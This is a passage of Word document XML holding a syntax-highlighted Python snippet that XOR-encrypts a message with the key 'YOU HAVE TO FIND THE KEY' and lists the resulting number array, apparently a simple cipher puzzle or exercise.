              <w:t>xrange(</w:t>
            </w:r>
            <w:r>
              <w:t>len</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(msg)):</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C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>append</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>ord</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>msg</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>])</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>^</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>ord</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>key</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>%</w:t>
            </w:r>
            <w:r>
              <w:t>len</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>key</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)])</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>127</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return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>C</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>key</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"YOU</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>HAVE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>TO</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>FIND</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>THE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>KEY"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>msg</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"Python</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>is</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>widely</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>used</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>general-purpose,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>high-level</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>programming</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>language"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>53</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>83</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>127</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>69</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>89</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>58</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>85</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>127</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>66</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>91</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
